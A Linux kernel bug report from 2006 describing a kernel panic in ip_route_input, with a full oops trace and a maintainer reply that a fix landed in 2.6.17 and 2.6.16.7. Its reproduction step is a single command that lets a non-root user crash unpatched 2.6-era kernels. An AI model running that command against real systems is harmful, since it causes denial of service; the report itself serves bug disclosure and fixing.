Bug 6388

Summary: kernel panic in inet_rtm_getroute
Product: Networking Reporter: Alexandra Kossovsky (Alexandra.Kossovsky)
Component: IPV4Assignee: Stephen Hemminger (stephen)
Status: RESOLVED CODE_FIX    
Severity: high    
Priority: P2    
Hardware: i386   
OS: Linux   
Kernel Version: 2.6.16.4 Subsystem:
Regression: --- Bisected commit-id:

Description Alexandra Kossovsky 2006-04-14 01:40:15 UTC 
Most recent kernel where this bug did not occur: 2.6.8 has this problem, I did
not tried earlier kernels
Distribution: Debian
Hardware Environment: ethernet network card, I've tried i386 and x86_64 archs.
Software Environment:

Problem Description:
The following command from user (even non-root) shell:
user-shell$ ip ro get 224.0.0.1 iif eth0
leads to kernel panic:
Unable to handle kernel NULL pointer dereference at virtual address 00000009
 printing eip:
c023c1c3
*pde = 00000000
Oops: 0000 [#1]
SMP
Modules linked in: autofs4 nfs lockd nfs_acl sunrpc dm_mod e100 mii e1000 ipv6
genrtc ext2 mbcache ide_disk generic piix ide_core evdev mousedev
CPU:    0
EIP:    0060:[<c023c1c3>]    Not tainted VLI
EFLAGS: 00010286   (2.6.16.4-1ol1 #1)
EIP is at ip_route_input+0xca/0x17e
eax: 00000000   ebx: c16a4600   ecx: 00000000   edx: de175180
esi: 010000e0   edi: 00000000   ebp: df4ba000   esp: dda01b64
ds: 007b   es: 007b   ss: 0068
Process ip (pid: 1531, threadinfo=dda00000 task=dff47560)
Stack: <0>00000000 de175180 de175180 ffffffed 00000000 c1581e00 c023d5dc de175180
       010000e0 00000000 00000000 df4ba000 dfe593d0 00000000 00000000 00000003
       010000e0 00000000 00000009 00000000 00000c14 c02e95cd df147800 c022b325
Call Trace:
 [<c023d5dc>] inet_rtm_getroute+0xf6/0x236
 [<c022b325>] rtnetlink_fill_ifinfo+0x3bc/0x50a
 [<c022b37c>] rtnetlink_fill_ifinfo+0x413/0x50a
 [<c022b4b3>] rtnetlink_dump_ifinfo+0x40/0x65
 [<c022ba74>] rtnetlink_rcv_msg+0x1c4/0x1e7
 [<c022b8b0>] rtnetlink_rcv_msg+0x0/0x1e7
 [<c02372f3>] netlink_rcv_skb+0x3a/0x8f
 [<c023738a>] netlink_run_queue+0x42/0xc4
 [<c022b8b0>] rtnetlink_rcv_msg+0x0/0x1e7
 [<c022b8b0>] rtnetlink_rcv_msg+0x0/0x1e7
 [<c022b85e>] rtnetlink_rcv+0x22/0x40
 [<c022b8b0>] rtnetlink_rcv_msg+0x0/0x1e7
 [<c0236d0a>] netlink_data_ready+0x17/0x54
 [<c0236145>] netlink_sendskb+0x1f/0x39
 [<c0236b0c>] netlink_sendmsg+0x281/0x292
 [<c021b241>] sock_sendmsg+0xe6/0x104
 [<c021b38e>] sock_recvmsg+0xf3/0x111
 [<c021b241>] sock_sendmsg+0xe6/0x104
 [<c0129df6>] autoremove_wake_function+0x0/0x3a
 [<c01b4b49>] copy_from_user+0x3a/0x5d
 [<c0220e81>] verify_iovec+0x49/0x7f
 [<c021c8a7>] sys_sendmsg+0x158/0x1ae
 [<c013a88b>] get_page_from_freelist+0x70/0x88
 [<c013a8e9>] __alloc_pages+0x46/0x263
 [<c01422a4>] do_anonymous_page+0xc5/0x148
 [<c0111b34>] do_page_fault+0x18a/0x4e0
 [<c01b4b49>] copy_from_user+0x3a/0x5d
 [<c021cc25>] sys_socketcall+0x167/0x180
 [<c01119aa>] do_page_fault+0x0/0x4e0
 [<c01026af>] sysenter_past_esp+0x54/0x75
Code: e0 34 c0 ff 40 38 8b 09 85 c9 75 a0 89 f0 25 f0 00 00 00 3d e0 00 00 00 75
66 8b 9d a8 00 00 00 85 db 74 55 8b 54 24 04 8b 42 20 <0f> b6 40 09 50 57 56 53
e8 bd 71 02 00 83 c4 10 89 c2 85 c0 75
 <0>Kernel panic - not syncing: Fatal exception in interrupt

backtrace is slightly different for different kernel versions/hardware type. The
trace above is for 2.6.16.4 

Steps to reproduce:
run shell command "ip ro get 224.0.0.1 iif eth0"
Comment 1 Stephen Hemminger 2006-04-18 10:11:50 UTC 
Bug fix has been integrated into current 2.6.17 tree and submitted for 2.6.16.7